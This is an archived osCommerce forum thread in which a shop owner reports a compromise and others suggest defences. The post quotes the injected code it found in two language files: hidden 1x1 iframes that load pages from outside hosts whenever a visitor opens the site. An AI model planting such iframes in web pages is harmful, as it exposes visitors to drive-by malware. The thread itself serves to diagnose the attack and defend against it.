Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

osCommerce Hacked??


jethfo

Recommended Posts

Posted

The following code was somehow inserted into two oscommerce files on my server. This caused malicious code to be executed in the background when anyone tried to open the site. I cleaned out the hack and changed the permissions back to -rwxr-xr-x on both files. Somehow the hacker was able to change the permission of these files to be world writeable -rwxrwxrwx.

 

/catalog/includes/languages/english.php

/catalog/includes/languages/english/default.php

 

 

``<iframe src="http://aflashcounter.net/tds/out.php?s_id=6" frameborder="0" height="1" width="1"></iframe>``<span style="visibility: hidden"><iframe src="http://skaska.biz/ver2/login.php" width="1" height="1"></iframe></span>

 

Does anyone know how this could've happened and how I can prevent it from happening again? I've had similar problems with Forums being hacked in the past.

 

Thanks for the help in advance!

Posted

I worry about this kind of thing all the time. If I expect to be a successful online retailer, getting hacked is about the worst thing that can possibly happen. So I'm always very weary of open source programs such as this one, because any hacker can download the free package, learn the ins and outs of the program, and learn to hack every single one of our stores. It's always safer to write your own unique code and not share it with anyone. However, I do not know PHP, so I'm kind of screwed and at the mercy of programs such as this one.

Posted

Run a dedicated non shared linux server. Also, users, hackers, crackers can insert code into mysql using a text field in a form. Somewhere there is a document that establishes the way to code to avoid these situations. If a basic HTML form is used without the oscommerce secure functions then a customer can insert PHP code into the field to the db and then can be inserted into a file with a simple view of the data they just input. Then your hacked.

 

Use tep_href, tep_db_prepare_input, tep_db_input, and the form functions provided in OSC like tep_draw_input_field.

 

nibl69... have faith in osc and PHP. You are not at the mercy but in the grace of alot of good programmers. It is not true that you can write your own unique code and think it is safe. It may not take all of the practices involved in keeping a site hack proof.

Posted

One quick thing I did and recommend is to disable/remove the 'Define Languaje' and 'File manager' on Tools in the Admin Control panel (I removed the files too since they can be called directly from the address bar) because I Do not need access through there (Cause I can do it from my site control panel). In the case someone hack/crack/find-out the admin .htaccess info to access it, they will not have access to modify this files. I also installed a contribution called 'Site Monitor' which emails me as soon as a page or anything else has changed on the site. I also renamed/moved my download folder behind the public_html section too.

 

I just try to make this as much secured as possible but there is always a way to hack anything... the thing is to make it a little more difficult to discourage the intruders.

Posted
I worry about this kind of thing all the time. If I expect to be a successful online retailer, getting hacked is about the worst thing that can possibly happen. So I'm always very weary of open source programs such as this one, because any hacker can download the free package, learn the ins and outs of the program, and learn to hack every single one of our stores. It's always safer to write your own unique code and not share it with anyone. However, I do not know PHP, so I'm kind of screwed and at the mercy of programs such as this one.

You should probably inform Red Hat, Ibm and all of the other company's that work with Linux of this problem. PHP is also open source. Maybe Oscommerce could get hacked from the ground up?

Other great Open Source (Free) programs: (Free as in free speech not free beer)

The Gimp - An image program. | Firefox - All you have to do is add the Web Developer add-on to make this web browser complete. | FileZilla - An ftp program. | Inkscape - A good program to create images with. | Thunderbird - An email program. | Openoffice.org - An office suite that is compatible with MS Office. | Abiword - Another office suite. | Audacity - A sound recording tool. | ddp's Picks | Wordpress - An easy to use blogging software. | Joomla - An easy to use CMS that has ecommerce plug-ins. | Drupal - Another CMS

How do I find these programs? Google Search!

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...